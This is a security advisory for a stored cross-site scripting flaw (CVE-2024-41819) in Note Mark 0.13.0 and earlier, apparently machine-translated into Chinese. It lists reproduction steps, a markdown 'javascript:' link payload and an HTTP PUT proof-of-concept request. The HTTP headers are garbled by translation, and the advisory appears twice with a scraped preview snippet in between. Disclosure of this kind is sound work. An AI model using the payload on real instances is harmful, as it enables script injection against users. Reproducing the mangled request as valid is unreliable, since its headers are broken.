#利用title:在notemark中存储XSS
#日期: 07/29/2024
#利用作者: Alessio Romano(Sfoffo)
#供应商homepage3360 https://notemark.docs.enchantedcode.co.uk/
#版本: 0.13.0及以下
#在: Linux上测试
#参考:
notes.sfoffo.com
github.com
#CVE: CVE-2024-41819
##复制步骤
1。登录到应用程序。
2。创建新注释或输入先前创建的注释。
3。通过单击从选定的注释中访问注释编辑器功能
在“编辑器”选项卡上。
4。输入以下有效载荷:
[XSS-Link](JavaScript:Alert(1))
5。保存更改。
6。单击“渲染”选项卡以查看该渲染的标记版本
笔记。单击先前创建的链接以弹出注入的警报。
## HTTP请求POC
put/api/notes/note-uuid/content http/1.1
HOST: LOCALHOST:8000
ACCEPT: /
content-type: text/plain; charset=utf-8
内容长度: 34
sec-fetch-site:相同原产
授权:承载令牌
[XSS-Link](JavaScript:Alert(1))
#日期: 07/29/2024
#利用作者: Alessio Romano(Sfoffo)
#供应商homepage3360 https://notemark.docs.enchantedcode.co.uk/
#版本: 0.13.0及以下
#在: Linux上测试
#参考:
Sfoffo - Pentesting Notes
Stored XSS in the note link href attribute
### Summary A stored cross-site scripting (XSS) vulnerability in Note Mark version v0.13.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the URL value of a ...
github.com
##复制步骤
1。登录到应用程序。
2。创建新注释或输入先前创建的注释。
3。通过单击从选定的注释中访问注释编辑器功能
在“编辑器”选项卡上。
4。输入以下有效载荷:
[XSS-Link](JavaScript:Alert(1))
5。保存更改。
6。单击“渲染”选项卡以查看该渲染的标记版本
笔记。单击先前创建的链接以弹出注入的警报。
## HTTP请求POC
put/api/notes/note-uuid/content http/1.1
HOST: LOCALHOST:8000
ACCEPT: /
content-type: text/plain; charset=utf-8
内容长度: 34
sec-fetch-site:相同原产
授权:承载令牌
[XSS-Link](JavaScript:Alert(1))